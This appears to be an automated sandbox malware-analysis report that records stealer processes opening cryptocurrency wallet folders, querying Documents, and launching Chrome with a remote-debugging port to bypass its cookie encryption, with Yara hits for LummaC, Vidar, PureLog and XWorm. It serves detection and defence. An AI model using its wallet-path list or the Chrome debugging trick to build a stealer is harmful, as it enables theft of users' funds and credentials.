Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: Appeal.com	Binary or memory string: WIN_81
Source: Appeal.com	Binary or memory string: WIN_XP
Source: Appeal.com, 00000014.00000002.3538452802.00000000004D3000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Appeal.com	Binary or memory string: WIN_XPe
Source: Appeal.com	Binary or memory string: WIN_VISTA
Source: Appeal.com	Binary or memory string: WIN_7
Source: Appeal.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX

Source: Yara match	File source: 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2989447188.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2737975920.0000000001232000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3003073654.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Appeal.com PID: 4340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8a7032211b.exe PID: 4464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 714ab8b5fd.exe PID: 7092, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 2328527160.exe PID: 3396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8a7032211b.exe PID: 4464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 714ab8b5fd.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 22.0.2328527160.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.2328527160.exe.3f19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.2328527160.exe.3f19550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2236560137.0000000000AC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2569687773.0000000003F19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000024.00000002.4195692760.0000000002C61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.4194980301.0000000002BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crossplatformplayer.exe PID: 4856, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 20.2.Appeal.com.4fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.2709397792.0000000001C1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3739881642.0000000004FA1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2709605016.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3028149914.0000000003B1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2709470347.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Appeal.com PID: 4340, type: MEMORYSTR

Yara detected XWorm

